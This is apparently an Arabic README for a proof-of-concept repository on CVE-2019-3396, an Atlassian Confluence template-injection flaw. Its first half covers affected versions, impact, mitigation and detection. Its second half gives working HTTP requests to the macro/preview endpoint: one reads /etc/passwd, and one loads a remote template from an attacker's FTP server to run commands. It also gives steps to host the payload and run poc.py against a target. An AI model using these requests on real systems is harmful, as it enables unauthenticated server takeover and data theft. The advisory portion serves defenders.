CVE-2019-3396
CVE-2019-3396 ثغرة Confluence - SSTI RCE
🔎 ما هي CVE-2019-3396؟
- ثغرة Confluence حرجة (Atlassian).
- النوع: حقن القوالب + اجتياز المسار.
- الخطورة: تنفيذ تعليمات برمجية عن بُعد (RCE) بدون تسجيل دخول.
- الحالة: تم استغلالها في البرية.
🛑 الإصدارات المتأثرة
- 6.6.0 → 6.6.11 ❌ متأثرة
- 6.6.12 ✅ مُصلَحة
- 6.12.0 → 6.12.2 ❌ متأثرة
- 6.12.3 ✅ مُصلَحة
- 6.13.0 → 6.13.2 ❌ متأثرة
- 6.13.3 ✅ مُصلَحة
- 6.14.0 → 6.14.1 ❌ متأثرة
- 6.14.2 ✅ مُصلَحة
👉 تحقق دائمًا من النشرة الرسمية من Atlassian للتفاصيل الكاملة.
💥 التأثير
- السيطرة الكاملة على الخادم
- سرقة البيانات، برامج الفدية، وأجهزة تعدين العملات الرقمية
- يمكن للمهاجمين تنفيذ أي كود يريدونه
🔐 التخفيف
- ✅ قم بالترقية إلى إصدار Confluence المحدّث (أفضل إصلاح)
- 🚫 عطّل ماكرو Widget Connector إذا لم تستطع تطبيق التصحيح فورًا
- 🔒 قيّد الوصول (داخليًا فقط حتى يتم الإصلاح)
👀 الاكتشاف (نصائح آمنة)
- راقب السجلات بحثًا عن طلبات غريبة تصل إلى نقاط نهاية macro/preview
- ابحث عن عمليات غير اعتيادية أو حركة مرور صادرة
- استخدم ماسحات الثغرات لتأكيد الإصدار
📂 قراءة ملف
POST /rest/tinymce/1/macro/preview HTTP/2
Host: {***}
{"macro":{"params":{"_template":"file:///etc/passwd"}}}
تنفيذ أمر
POST /rest/tinymce/1/macro/preview HTTP/2
Host: ***
{"contentId":"1","macro":{"name":"widget","params":{"_template":"ftp://***:8888/cmd.vm","command":"id"},"body":""}}
الأتمتة
- ارفع ملف cmd.vm على خادمك الخاص (VPS)
- استخدم ftp أو https لإنشاء رابط لهذا الملف cmd.vm عبر
pip install pyftpdlib
python -m pyftpdlib -p 8888
- حدّث ملف poc.py بالقيمة الجديدة لـ pyftp = "ftp://10.100.10.100:8888/cmd.vm"
python poc.py <url> <cmd>
python poc.py https://ip:port "id"
⚠️ نصيحة — هذا المستودع مخصص فقط للتعليم والدفاع والتوعية.
🔗 المراجع